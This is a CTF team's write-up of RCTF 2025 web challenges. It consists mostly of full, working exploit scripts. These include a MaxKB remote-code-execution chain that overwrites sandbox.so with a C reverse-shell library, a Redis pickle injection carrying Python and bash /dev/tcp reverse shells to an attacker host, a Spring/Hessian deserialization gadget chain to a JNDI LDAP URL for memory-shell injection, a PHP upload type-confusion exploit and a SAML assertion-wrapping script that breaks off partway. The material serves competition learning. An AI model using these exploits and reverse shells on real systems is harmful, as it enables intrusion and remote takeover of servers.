本次 RCTF 我们 SU 取得了 第五名 的成绩,感谢队里师傅们的辛苦付出!同时我们也在持续招人,欢迎发送个人简介至:suers_xctf@126.com 或者直接联系baozongwi QQ:2405758945。
以下是我们 SU 本次 2025 RCTF 的 WriteUp。

Web
RootKB
当时看见这题俺都惊了,为什么最新版本7~8解,低版本0解

在pycharm 上对比发现 v2.3.1 和 v2.3.0 改动发现添加了sandbox.so 和 LD_PRELOAD 环境变量且sandbox.so 允许被覆盖,那么参考 LD_PRELOAD 劫持即可

感觉开发者的修法好抽象,用sandbox.so修复了一个SSRF结果又来一个RCE,俺也不知道俺也不敢问

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
MaxKB RCE Exploit - Complete Attack Chain
增加:远程写文件功能 write_remote_file()
"""
import requests
import json
import sys
import os
import base64
import textwrap
# Target configuration
TARGET_URL = "http://web-rootkb-minusminus-54b389641de5.rctf.rois.team"
USERNAME = "admin"
PASSWORD = "MaxKB@123.."
# API endpoints
API_BASE = f"{TARGET_URL}/admin/api"
TOOL_DEBUG_API = f"{API_BASE}/workspace/default/tool/debug"
# Session setup
session = requests.session()
session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Content-Type': 'application/json',
'Accept': 'application/json'
})
def login():
"""Login to MaxKB and get JWT token"""
login_data = {
"username": USERNAME,
"password": PASSWORD,
"captcha": ""
}
login_api = f"{API_BASE}/user/login"
try:
resp = session.post(login_api, json=login_data)
if resp.status_code == 200:
result = resp.json()
if 'data' in result and result['data'] and 'token' in result['data']:
token = result['data']['token']
session.headers['AUTHORIZATION'] = f'Bearer {token}'
print(f"[+] Login successful!")
print(f"[+] JWT Token: {token[:50]}...")
return True
else:
print(f"[-] Login failed: {result}")
return False
else:
print(f"[-] Login request failed: {resp.status_code}")
return False
except Exception as e:
print(f"[-] Login error: {e}")
return False
def execute_python_code(code):
"""Execute Python code through tool debug endpoint"""
payload = {
"code": code,
"input_field_list": [],
"init_field_list": [],
"init_params": {},
"debug_field_list": []
}
try:
resp = session.post(TOOL_DEBUG_API, json=payload)
if resp.status_code == 200:
result = resp.json()
print(result)
return result.get('data', 'No data returned')
else:
return f"HTTP {resp.status_code}: {resp.text}"
except Exception as e:
return f"Exception: {e}"
def execute_system_command(cmd):
"""Execute system command using Python equivalents"""
if cmd == "id":
code = """def get_id():
import os
return f"uid={os.getuid()}({os.environ.get('USER', 'unknown')}) gid={os.getgid()}"
return get_id()"""
elif cmd == "ls /":
code = """def ls_root():
import os
items = os.listdir('/')
items.sort()
return "\\n".join(items)
return ls_root()"""
elif cmd.startswith("cat "):
filepath = cmd.split(" ", 1)[1]
code = f"""def read_file():
try:
with open('{filepath}', 'r') as f:
return f.read()
except Exception as e:
return f"Error: {{str(e)}}"
return read_file()"""
else:
# Generic command execution(这里只是示例,用 os.listdir 代替)
code = f"""def run_cmd():
import os
try:
return str(os.listdir('{cmd}'))
except Exception as e:
return f"Command execution failed: {{e}}"
return run_cmd()"""
return execute_python_code(code)
# ========= 新增:远程写文件功能 =========
def write_remote_file(remote_path, b64_content, mode="wb"):
"""
在目标机器上写二进制文件(从 base64 字符串解码)
:param remote_path: 目标文件路径,例如 '/tmp/pwned.bin'
:param b64_content: base64 编码后的内容(str)
:param mode: 文件模式,默认 'wb',可以传 'ab' 追加二进制
"""
code = f"""def write_file():
import base64
path = {remote_path!r}
b64_data = {b64_content!r}
mode = {mode!r}
try:
data = base64.b64decode(b64_data)
with open(path, mode) as f:
f.write(data)
return f"OK: wrote {{len(data)}} bytes to {{path}} with mode={{mode}}"
except Exception as e:
return f"Error writing to {{path}}: {{e}}"
return write_file()"""
return execute_python_code(code)
# ======================================
def execute_redis_command(host, port, password, command):
"""
在目标机器上执行 Redis 命令
:param host: Redis 服务器地址
:param port: Redis 服务器端口
:param password: Redis 密码,如果没有则为 None
:param command: 要执行的 Redis 命令,以字符串形式提供,例如 "KEYS *" 或 "GET mykey"
:return: 命令执行结果或错误信息
"""
code = f"""def redis_cmd_runner():
try:
import redis
import json
except ImportError:
return "Error: 'redis' library not found on the target system."
# 将外部传入的参数赋值给内部变量
redis_host = {host!r}
redis_port = {port}
redis_password = {password!r} # 如果 password 为 None,!r 会正确处理成 'None'
command_str = {command!r}
try:
# 建立 Redis 连接
# decode_responses=False 是默认行为,我们会手动解码,以更好地处理潜在的编码错误
r = redis.Redis(host=redis_host, port=redis_port, password=redis_password, db=0)
# 测试连接
r.ping()
# 将命令字符串拆分成列表,以便传递给 execute_command
command_parts = command_str.split()
# 执行命令
raw_result = r.execute_command(*command_parts)
# Redis 的返回结果通常是 bytes 或 list of bytes,需要解码
def decode_redis_result(item):
if isinstance(item, bytes):
return item.decode('utf-8', 'ignore') # 使用 ignore 以免遇到非 utf8 字符时崩溃
elif isinstance(item, list):
return [decode_redis_result(i) for i in item]
else:
return item # 对于数字等类型,直接返回
result = decode_redis_result(raw_result)
# 以 JSON 格式返回,统一输出
return json.dumps(result, indent=2, ensure_ascii=False)
except Exception as e:
return f"Redis Error: {{e}}"
return redis_cmd_runner()"""
return execute_python_code(code)
def get_environment_variables():
"""
在目标机器上获取并返回所有环境变量
"""
code = f"""def dump_env_vars():
import os
try:
env_data = str(os.environ)
path = "/opt/maxkb-app/sandbox/env.txt"
with open(path, 'w', encoding='utf-8') as f:
f.write(env_data)
return env_data
except Exception as e:
return f"Error getting environment variables: {{e}}"
return dump_env_vars()"""
return execute_python_code(code)
def main():
"""Main exploitation function"""
print("=" * 60)
print("MaxKB RCE Exploit - Complete Attack Chain")
print("=" * 60)
print(f"[+] Target: {TARGET_URL}")
print(f"[+] Username: {USERNAME}")
print(f"[+] Exploit endpoint: {TOOL_DEBUG_API}")
# Step 1: Login
print("\n[+] Step 1: Authentication")
if not login():
print("[-] Exploit failed - cannot login")
return
# Step 2: Test basic code execution
print("\n[+] Step 2: Remote Code Execution")
print("\n[*] Testing code execution:")
code = """def test():
return "RCE confirmed - Code execution successful!"
return test()"""
result = execute_python_code(code)
print(f"[Result] {result}")
# Step 3: System Command Execution
print("\n[+] Step 3: System Command Execution")
commands = ["""/opt/maxkb-app/sandbox/""", "echo 123"]
for cmd in commands:
print(f"\n[*] Executing: {cmd}")
result = execute_system_command(cmd)
print(f"[Output]\n{result}")
# 新增:写文件测试
print("\n[+] Step 3.5: Remote File Write Test")
test_path = "/opt/maxkb-app/sandbox/sandbox.so"
with open("revshell.so", "rb") as f:
raw = f.read()
b64_str = base64.b64encode(raw).decode("ascii")
result = write_remote_file(test_path, b64_str)
print(f"[Write Result] {result}")
# 顺便读回来看是否写入成功
print("\n[*] Read back the written file:")
read_back = execute_system_command(f"cat {test_path}")
print(f"[File Content]\n{read_back}")
# ========= 新增步骤:与数据库交互 =========
print("\n[+] Step 5: PostgreSQL Database Interaction")
# !!! 关键 !!!
# 这里的连接字符串需要你自己去发现。
# 通常可以通过读取配置文件获得,例如:
# execute_system_command("cat /opt/maxkb-app/conf/application.yml")
# 假设我们通过某种方式得知了以下连接信息
db_conn_str = "dbname='maxkb' user='root' host='127.0.0.1' password='Password123@postgres'"
print(f"[*] Using DB connection string (example): {db_conn_str}")
# 示例 1: 列出所有数据库
print("\n[*] Query 1: Listing all databases...")
list_db_query = "SELECT datname FROM pg_database WHERE datistemplate = false;"
result = query_postgresql(db_conn_str, list_db_query)
print(f"[Result]\n{result}")
# ========= 新增步骤:与 Redis 服务交互 =========
print("\n[+] Step 6: Redis Service Interaction")
# !!! 关键 !!!
# Redis 的连接信息也需要通过读取配置文件或其他方式来发现
# 比如在 application.yml 中可能会有 spring.redis.host, spring.redis.port 等
redis_host = "127.0.0.1"
redis_port = 6379
redis_password = "Password123@redis" # 如果有密码,替换成 "your_redis_password"
# 定义一组想要执行的 Redis 命令
redis_commands = [
"INFO", # 获取 Redis 服务器信息,可以确认连接和服务版本
"KEYS *", # 列出所有的 key,这是最常用的探测命令
"GET flag", # 尝试获取一个名为 'flag' 的 key 的值
"HGETALL user:1", # 假设有一个哈希表存储用户信息,获取所有字段和值
"set "
]
for cmd in redis_commands:
print(f"\n[*] Executing Redis command: '{cmd}'")
result = execute_redis_command(redis_host, redis_port, redis_password, cmd)
print(f"[Result]\n{result}")
# ==========================================
if exploit_result and "Success" in exploit_result:
print(f"[+] {exploit_result}")
print("[!] On a vulnerable version, this could lead to RCE!")
else:
print(f"[-] {exploit_result}")
print("\n" + "=" * 60)
print("[+] EXPLOIT FINISHED")
print("=" * 60)
if __name__ == "__main__":
main()
// 文件名: revshell.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
// 这是一个构造函数,当 .so 文件被加载时,它会自动运行。
void _revshell_init(void) __attribute__((constructor));
void _revshell_init(void) {
// --- 在这里修改为你自己的 IP 和端口 ---
const char *ip = "xxxx"; // <--- 修改这里
const int port = 9999; // <--- 修改这里
// ------------------------------------
int sockfd;
struct sockaddr_in addr;
// 1. 创建一个 socket
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
// 创建失败,安静地退出
return;
}
// 2. 设置要连接的目标地址和端口
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
// 将 IP 地址字符串转换为网络格式
if (inet_pton(AF_INET, ip, &addr.sin_addr) <= 0) {
close(sockfd);
return;
}
// 3. 连接到攻击者的监听器
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
close(sockfd);
return;
}
// 4. I/O 重定向:这是最关键的一步
// 将标准输入(0)、标准输出(1)和标准错误(2)全部重定向到我们的 socket
dup2(sockfd, 0); // STDIN
dup2(sockfd, 1); // STDOUT
dup2(sockfd, 2); // STDERR
// 5. 启动一个 shell
// execve 会用 /bin/sh 进程替换掉当前进程
// 因为我们已经重定向了 I/O,这个 shell 的所有输入输出都会通过 socket 传输
execve("/bin/sh", NULL, NULL);
// 如果 execve 成功,下面的代码将不会被执行
close(sockfd);
}
VPS 上接收shell ,获得FLAG

RootKB–
Python 沙箱绕过俺不会,但是打redis 触发 pickle 反序列化这个俺会,话不多说直接丢脚本

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
MaxKB RCE Exploit - Complete Attack Chain
增加:远程写文件功能 write_remote_file()
增加:Redis Pickle 注入功能 inject_pickle_payload()
修正:修复了所有 'return' outside function 的语法错误
"""
import requests
import json
import sys
import os
import base64
import textwrap
import pickle
import subprocess
# Target configuration
TARGET_URL = "http://xxx:8030/"
USERNAME = "admin"
PASSWORD = "MaxKB@123.."
# API endpoints
API_BASE = f"{TARGET_URL}/admin/api"
TOOL_DEBUG_API = f"{API_BASE}/workspace/default/tool/debug"
# Session setup
session = requests.session()
session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Content-Type': 'application/json',
'Accept': 'application/json'
})
def login():
"""
Login to MaxKB and get JWT token.
Returns the token string on success, None on failure.
"""
login_data = {
"username": USERNAME,
"password": PASSWORD,
"captcha": ""
}
login_api = f"{API_BASE}/user/login"
try:
resp = session.post(login_api, json=login_data)
if resp.status_code == 200:
result = resp.json()
if 'data' in result and result['data'] and 'token' in result['data']:
token = result['data']['token']
session.headers['AUTHORIZATION'] = f'Bearer {token}'
print(f"[+] Login successful!")
print(f"[+] JWT Token: {token[:50]}...")
return token
else:
print(f"[-] Login failed: {result}")
return None
else:
print(f"[-] Login request failed: {resp.status_code}")
return None
except Exception as e:
print(f"[-] Login error: {e}")
return None
def execute_python_code(code):
"""Execute Python code through tool debug endpoint"""
payload = {
"code": code,
"input_field_list": [],
"init_field_list": [],
"init_params": {},
"debug_field_list": []
}
try:
resp = session.post(TOOL_DEBUG_API, json=payload)
if resp.status_code == 200:
result = resp.json()
# print(result) # Uncomment for deep debugging
if result.get('code') != 200:
print(f"[-] Server-side error: {result.get('message')}")
return result.get('data', 'No data returned')
else:
return f"HTTP {resp.status_code}: {resp.text}"
except Exception as e:
return f"Exception: {e}"
# ======================================
# ========= 新增:Pickle注入功能 =========
# ======================================
class PickleRCE:
def __init__(self, command):
self.command = command
def __reduce__(self):
# 返回一个可调用对象和其参数
return (subprocess.call, (["python3","-c",'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxxx",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'],))
def inject_pickle_payload(redis_host, redis_port, redis_password, token, command):
"""
Generates a pickle payload and injects it into Redis via the RCE vulnerability.
"""
print(f"[*] Crafting pickle payload to execute command: '{command}'")
pickle_payload = pickle.dumps(PickleRCE(command))
b64_payload = base64.b64encode(pickle_payload).decode('ascii')
redis_key = f":TOKEN:{token}"
print(f"[*] Target Redis key will be: {redis_key}")
remote_code = f"""
def set_pickle_in_redis():
import redis
import base64
try:
r = redis.Redis(host={redis_host!r}, port={redis_port}, password={redis_password!r}, db=0)
redis_key = {redis_key!r}
b64_payload = {b64_payload!r}
pickle_data = base64.b64decode(b64_payload)
r.set(redis_key, pickle_data)
return f"OK: Successfully wrote {{len(pickle_data)}} bytes of pickle data to key '{{redis_key}}'."
except Exception as e:
return f"Redis Error: {{e}}"
set_pickle_in_redis() # <-- FIX: Removed 'return' from here
"""
print("[*] Sending payload to remote server to inject into Redis...")
return execute_python_code(remote_code)
def execute_system_command(cmd):
"""Execute system command using a robust method."""
# Using subprocess is generally better than os.system for capturing output
code = f"""
def run_cmd():
import subprocess
import shlex
command = {cmd!r}
try:
# Use shlex.split for better argument handling
args = shlex.split(command)
result = subprocess.run(args, capture_output=True, text=True, timeout=10)
output = result.stdout if result.stdout else ""
error = result.stderr if result.stderr else ""
if output or error:
return f"STDOUT:\\n{{output}}\\nSTDERR:\\n{{error}}"
else:
return "Command executed with no output."
except FileNotFoundError:
return f"Error: Command not found or path does not exist."
except Exception as e:
return f"Command execution failed: {{e}}"
run_cmd() # <-- FIX: Removed 'return' from here
"""
return execute_python_code(code)
def main():
"""Main exploitation function"""
print("=" * 60)
print("MaxKB RCE Exploit - Complete Attack Chain")
print("=" * 60)
print(f"[+] Target: {TARGET_URL}")
# Step 1: Login
print("\n[+] Step 1: Authentication")
token = login()
if not token:
print("[-] Exploit failed - cannot login")
return
# Optional Step: Test basic code execution
print("\n[*] Testing basic code execution...")
test_code = """
def test():
return "RCE confirmed - Code execution successful!"
test()
""" # <-- FIX: Removed 'return' from here too
result = execute_python_code(test_code)
print(f"[Result] {result}")
if "RCE confirmed" not in str(result):
print("[-] Basic RCE test failed. Aborting.")
return
# ==========================================================
# ========= 核心利用步骤:注入Pickle Payload到Redis =========
# ==========================================================
print("\n[+] Step 2: Injecting Pickle Payload into Redis for RCE")
# Configure Redis connection info
redis_host = "127.0.0.1"
redis_port = 6379
redis_password = "Password123@redis"
# Define the command you want to execute on the target server
command_to_execute = "bash -c 'bash -i >& /dev/tcp/YOUR_ATTACKER_IP/YOUR_PORT 0>&1'"
# Or for a simple test:
# command_to_execute = "touch /tmp/pwned_by_pickle"
# Call the injection function
result = inject_pickle_payload(redis_host, redis_port, redis_password, token, command_to_execute)
print(f"[Injection Result] {result}")
if "OK:" in str(result):
print("\n[+] Pickle payload injected successfully!")
print("[*] The next time the application deserializes this token from Redis,")
print(f"[*] the command '{command_to_execute}' should be executed on the server.")
print("[*] You may need to trigger this by making another authenticated request or simply waiting.")
print("[*] If using a reverse shell, make sure your listener (e.g., 'nc -lvnp YOUR_PORT') is running.")
else:
print("\n[-] Failed to inject pickle payload.")
print("\n[+] You can now try to verify if the command was executed (if you used a non-interactive command).")
print("[*] For example, checking if the file '/tmp/pwned_by_pickle' exists:")
verification_result = execute_system_command("ls -l /tmp/pwned_by_pickle")
print(f"[Verification Result]\n{verification_result}")
print("\n" + "=" * 60)
print("[+] EXPLOIT FINISHED")
print("=" * 60)
if __name__ == "__main__":
main()
maybe_easy
经典JAVA 反序列化题目,复习一下SU18 巨佬文章
static {
WHITE_PACKAGES.add("com.rctf.server.tool.");
WHITE_PACKAGES.add("java.util.");
WHITE_PACKAGES.add("org.apache.commons.logging.");
WHITE_PACKAGES.add("org.springframework.beans.");
WHITE_PACKAGES.add("org.springframework.jndi.");
}
观察发现白名单跟Spring AOP 和 Spring Context & AOP 两条链子关系很大,最后极有可能打的是JNDI

给了个chain 类存在compareTo方法,那么kick-off入口类也就确定了是TreeMap,TreeMap可以触发compareTo
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
package com.rctf.server.tool;
import java.io.Serializable;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
public class Maybe extends Proxy implements Comparable<Object>, Serializable {
public Maybe(InvocationHandler h) {
super(h);
}
public int compareTo(Object o) {
try {
Method method = Comparable.class.getMethod("compareTo", Object.class);
Object result = this.h.invoke(this, method, new Object[]{o});
return (Integer)result;
} catch (Throwable e) {
throw new RuntimeException(e);
}
}
}
在idea 里面扒一扒继承InvocationHandler 接口且在白名单的类有哪些,只有这三个

EarlySingletonInvocationHandler 类看着没啥用

ServiceLocatorInvocationHandler 类最后会触发args[0]的toString 方法,利用难度太大



参考Spring1 链子易知ObjectFactoryDelegatingInvocationHandler可以自定义的ObjectFactory 类触发 getObject 方法

翻了一下找到了TargetBeanObjectFactory 这个类,恰巧SimpleJndiBeanFactory 这个类继承自BeanFactory 接口,其中的getBean 方法会触发lookup ,一切就大功告成了




PoC如下,用java-chains 打 JNDI 二次反序列化注入内存马即可
package org.example;
import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.Hessian2Output;
import com.caucho.hessian.io.SerializerFactory;
import org.apache.commons.logging.impl.NoOpLog;
import org.example.tool.HessianFactory;
import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor;
import org.springframework.aop.target.HotSwappableTargetSource;
import org.springframework.jndi.support.SimpleJndiBeanFactory;
import org.springframework.scheduling.annotation.AsyncAnnotationAdvisor;
import com.rctf.server.tool.Maybe;
import org.springframework.beans.factory.BeanFactory;
import org.springframework.beans.factory.ObjectFactory;
import org.springframework.jndi.support.SimpleJndiBeanFactory;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.*;
public class PoC1 {
public static void main(String[] args) throws Exception {
// ldap url
String url = "ldap://xxxx:50389/4e13d5";
SimpleJndiBeanFactory beanFactory = new SimpleJndiBeanFactory();
// String SimpleJndiBeanFactory = "org.springframework.jndi.support.SimpleJndiBeanFactory";
// SimpleJndiBeanFactory beanFactory = (SimpleJndiBeanFactory) Class.forName(SimpleJndiBeanFactory).getDeclaredConstructor(new Class[]{}).newInstance();
beanFactory.setShareableResources(url);
Class<?> tboFactoryClass = Class.forName("org.springframework.beans.factory.config.ObjectFactoryCreatingFactoryBean$TargetBeanObjectFactory");
Constructor<?> tboFactoryConstructor = tboFactoryClass.getDeclaredConstructor(BeanFactory.class, String.class);
tboFactoryConstructor.setAccessible(true);
// 将我们的 JNDI BeanFactory 和 JNDI URL 注入
ObjectFactory<?> objectFactory = (ObjectFactory<?>) tboFactoryConstructor.newInstance(beanFactory, url);
// 3. 第二环:构造 ObjectFactoryDelegatingInvocationHandler
// 这个类是 AutowireUtils 的私有内部类,同样需要用反射
Class<?> ofdihClass = Class.forName("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler");
Constructor<?> ofdihConstructor = ofdihClass.getDeclaredConstructor(ObjectFactory.class);
ofdihConstructor.setAccessible(true);
// 将上一步构造的 ObjectFactory 注入
InvocationHandler handler = (InvocationHandler) ofdihConstructor.newInstance(objectFactory);
// 4. 第一环:构造 Maybe Gadget
Maybe maybeProxy = new Maybe(handler);
TreeMap<Object,Object> m = new TreeMap<>();
setFieldValue(m, "size", 2);
setFieldValue(m, "modCount", 2);
Class<?> nodeC = Class.forName("java.util.TreeMap$Entry");
Constructor nodeCons = nodeC.getDeclaredConstructor(Object.class, Object.class, nodeC);
nodeCons.setAccessible(true);
Object node = nodeCons.newInstance("RoboTerh", new Object[0], null);
Object right = nodeCons.newInstance(maybeProxy, new Object[0], node);
setFieldValue(node, "right", right);
setFieldValue(m, "root", node);
String payload_base64 = HessianFactory.serialize((Object) m);
System.out.println("payload_base64: " + payload_base64);
// HessianFactory.deserialize(payload_base64);
}
public static void setFiled(String classname, Object o, String fieldname, Object value) throws Exception {
Class<?> aClass = Class.forName(classname);
Field field = aClass.getDeclaredField(fieldname);
field.setAccessible(true);
field.set(o, value);
}
public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
public static Field getField (final Class<?> clazz, final String fieldName ) throws Exception {
try {
Field field = clazz.getDeclaredField(fieldName);
if ( field != null )
field.setAccessible(true);
else if ( clazz.getSuperclass() != null )
field = getField(clazz.getSuperclass(), fieldName);
return field;
}
catch ( NoSuchFieldException e ) {
if ( !clazz.getSuperclass().equals(Object.class) ) {
return getField(clazz.getSuperclass(), fieldName);
}
throw e;
}
}
}

感谢出题师傅手下留情,俺做出来了,要是学了这么久的JAVA要是这次再爆0,俺真的会玉玉了

photographer
入口在 public/index.php,其中完成了框架加载、鉴权初始化以及路由分发。请求经过 Apache 的 .htaccess 重写进入该入口,随后由路由器将 URL 映射到控制器方法。入口代码如下:
// public/index.php
require_once __DIR__ . '/../app/config/autoload.php';
Auth::init();
$router = new Router();
$routeLoader = require __DIR__ . '/../app/config/router.php';
$routeLoader($router);
$router->dispatch();
鉴权初始化的关键在 Auth::init(),它从会话中读取当前用户 ID 并去数据库查询用户对象。注意到,这个查询把用户表 user 与图片表 photo 做了连接,并且使用了 SELECT *
// app/middlewares/Auth.php
class Auth {
private static $user = null;
public static function init() {
if (session_status() === PHP_SESSION_NONE) {
session_name(config('session.name'));
session_start();
}
if (isset($_SESSION['user_id'])) {
self::$user = User::findById($_SESSION['user_id']);
}
}
public static function type() { return self::$user['type']; }
}
把用户类型值与 admin 的值(为 0)进行“更小于”的比较。也就是说,只有类型值小于 0 的用户才被视为“超管”。这段代码如下:
// public/superadmin.php
Auth::init();
$user_types = config('user_types');
if (Auth::check() && Auth::type() < $user_types['admin']) {
echo getenv('FLAG') ?: 'RCTF{test_flag}';
} else {
header('Location: /');
}
再看角色值的配置,明确把 admin 定义为 0,auditor 为 1,user 为 2。
// app/config/config.php
'user_types' => [
'admin' => 0,
'auditor' => 1,
'user' => 2
],
如果仅有这两处,攻击者还无法改变自己的类型为负数。但是获取查询是有问题的。User::findById 将用户表与图片表通过 LEFT JOIN 连接,并且使用 SELECT *,这会把两张表的所有列合并成一个关联数组。
如果存在同名列,右表会覆盖左表。user 表有 type(用户角色),photo 表也有 type(图片 MIME 类型)。所以只要设置了背景图(user.background_photo_id 指向某张 photo 记录)之后,查询结果中的 type 字段就来自 photo.type 而不是 user.type。代码如下:
// app/models/User.php
public static function findById($userId) {
return DB::table('user')
->leftJoin('photo', 'user.background_photo_id', '=', 'photo.id')
->where('user.id', '=', $userId)
->first();
}
Auth::type() 实际上读取的是图片的 type 字段。只要我们能让某张图片的 type 变成一个“可被 PHP 比较为更小于 0 的值”,就能在 superadmin.php 中通过“超管”判断。
图片的 type 是从上传接口写入的,这个接口直接把 $_FILES['type'] 原样存进数据库,而 $_FILES['type'] 由请求中的 multipart/form-data 文件分段头的 Content-Type 决定,完全可由客户端控制:
// app/controllers/PhotoController.php
$result = Photo::create([
'user_id' => Auth::id(),
'original_filename' => $file['name'],
'saved_filename' => $savedFilename,
'type' => $file['type'],
'size' => $file['size'],
...
]);
图片校验函数 isValidImage 并不校验或规范化客户端提交的 Content-Type,它仅验证扩展名、大小以及 getimagesize 是否能读出基本信息。因此我们既可以上传一张合法的 PNG/JPG 文件来满足这些检查,又可以在分段头将 Content-Type 写成任意字符串(例如 -1)。
// framework/helpers.php
function isValidImage($file) {
$allowedExtensions = config('upload.allowed_extensions');
$ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExtensions)) return false;
if ($file['size'] > config('upload.max_size')) return false;
$imageInfo = @getimagesize($file['tmp_name']);
if ($imageInfo === false) return false;
return true;
}
所以思路清晰了,首先在 /register 完成正常注册登录,随后构造原始 multipart/form-data 请求体,将文件分段头设为 Content-Type: -1 上传一张满足扩展名和 getimagesize 的合法图片,得到这张图片的 photo_id。然后调用 /api/user/background 将其设为当前用户的背景图。此时再访问 superadmin.php,由于 Auth::type() 读取的是 photo.type 且它是 -1,满足 < admin(0),服务器就会返回 FLAG。
POST /api/photos/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----X
------X
Content-Disposition: form-data; name="photos[]"; filename="x.png"
Content-Type: -1
PNG_BYTES...
------X--
exp 如下
import re
import json
import time
import os
import sys
import subprocess
import tempfile
import urllib.parse
import random
import string
IMG_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), "public/assets/img/default-avatar.png"))
BASES_DEFAULT = [
"http://1.95.160.41:26000",
"http://1.95.160.41:26001",
"http://1.95.160.41:26002",
]
TIMEOUT = 20
def run(cmd):
return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
def get_csrf_from_html(html):
m = re.search(r'name="csrf_token"\s+value="([^"]+)"', html)
return m.group(1) if m else None
def curl_get(url, cookie=None):
copt = f"-b {cookie}" if cookie else ""
return run(f"curl -s {copt} {url}")
def curl_post_form(url, data, cookie):
payload = urllib.parse.urlencode(data)
return run(f"curl -s -c {cookie} -b {cookie} -X POST {url} -d \"{payload}\"")
def build_multipart_body(img_bytes, field_name="photos[]", filename="x.png", forced_ct="-1"):
boundary = "----TraeBoundary" + "".join(random.choice(string.ascii_letters + string.digits) for _ in range(16))
head = (
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'
f"Content-Type: {forced_ct}\r\n\r\n"
).encode()
tail = f"\r\n--{boundary}--\r\n".encode()
body = head + img_bytes + tail
return boundary, body
def curl_post_multipart(url, boundary, body_path, cookie):
return run(f"curl -s -b {cookie} -H 'Content-Type: multipart/form-data; boundary={boundary}' --data-binary @{body_path} {url}")
def exploit_base(base):
port = base.split(":")[-1]
cookie = f"/tmp/photographer_{port}.cookie"
reg_html = run(f"curl -s -c {cookie} {base}/register")
csrf = get_csrf_from_html(reg_html)
if not csrf:
return f"{base} no csrf", None
email = f"exp_{int(time.time())}_{random.randint(1000,9999)}@example.com"
curl_post_form(f"{base}/api/register", {
"csrf_token": csrf,
"username": "ctfuser",
"email": email,
"password": "pw12345",
"confirm_password": "pw12345"
}, cookie)
with open(IMG_PATH, "rb") as f:
img_bytes = f.read()
boundary, body = build_multipart_body(img_bytes, field_name="photos[]", filename="x.png", forced_ct="-1")
body_path = tempfile.mktemp(prefix="photographer_body_", suffix=".bin")
with open(body_path, "wb") as bf:
bf.write(body)
up_json = curl_post_multipart(f"{base}/api/photos/upload", boundary, body_path, cookie)
try:
up = json.loads(up_json)
pid = up["photos"][0]["id"]
except Exception:
return f"{base} upload parse failed", None
settings_html = curl_get(f"{base}/settings", cookie)
csrf2 = get_csrf_from_html(settings_html)
if not csrf2:
return f"{base} settings csrf missing", None
curl_post_form(f"{base}/api/user/background", {
"photo_id": pid,
"csrf_token": csrf2
}, cookie)
flag = curl_get(f"{base}/superadmin.php", cookie)
return "ok", flag.strip()
def main():
bases = sys.argv[1:] or BASES_DEFAULT
results = []
for base in bases:
try:
status, flag = exploit_base(base)
results.append((base, status, flag))
except Exception as e:
results.append((base, "error", str(e)))
for base, status, flag in results:
print(f"{base} -> {status} -> {flag or '<no output>'}")
if __name__ == "__main__":
main()
auth
- authController.register 只在 parseInt(type) === 0 时才检查邀请码,因此我用 type=0x10 绕过了这一校验(见 idp-portal/src/controllers/authController.js (line 27))并完成了注册,但用户实际存储的 type 依然不为 0,所以 SAML 入口仍拒绝(samlController.idpInitiatedSSO/sso 均在 idp-portal/src/controllers/samlController.js (line 13) 和 (line 176) 处要求 req.session.userType === 0)。
- SP/admin 只检查会话中的 email 是否等于 admin@rois.team (sp-flag/app.py (line 88)),而自身的 SAML 验证足够严格;于是我写了 saml_exploit.py (line 1),自动注册、登录、触发 IDP 发回的 SAMLResponse,串联两份 Assertion 并把其中一个的 NameID 改成 admin 后再提交给 SP,成功绕过了权限并拿到了管理员页。
脚本附上
import base64
import random
import re
import string
import sys
import urllib.request
import urllib.parse
import http.cookiejar
IDP_BASE = "http://auth.rctf.rois.team"
SP_BASE = "http://auth-flag.rctf.rois.team:26000"
def make_opener():
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
opener.addheaders = [("User-Agent", "Mozilla/5.0 (saml-exploit)")]
return opener
def random_string(length=8):
return "".join(random.choice(string.ascii_lowercase) for _ in range(length))
def register_invited_user(opener, username, email, password):
data = urllib.parse.urlencode(
{
"type": "0x10", # bypass invite check, but stored as type=0 in MySQL
"invitationCode": "",
"username": username,
"email": email,
"password": password,
"confirmPassword": password,
"displayName": username,
"department": "IT",
}
).encode()
url = f"{IDP_BASE}/register"
resp = opener.open(url, data=data, timeout=10)
body = resp.read().decode("utf-8", errors="ignore")
print("[+] Register status:", resp.getcode(), "URL:", resp.geturl())
if "User Registration" in body and "alert-error" in body:
print("[!] Registration appears to have failed")
print(body[:300])
return False
return True
def login(opener, username, password):
data = urllib.parse.urlencode(
{
"username": username,
"password": password,
}
).encode()
url = f"{IDP_BASE}/login"
resp = opener.open(url, data=data, timeout=10)
body = resp.read().decode("utf-8", errors="ignore")
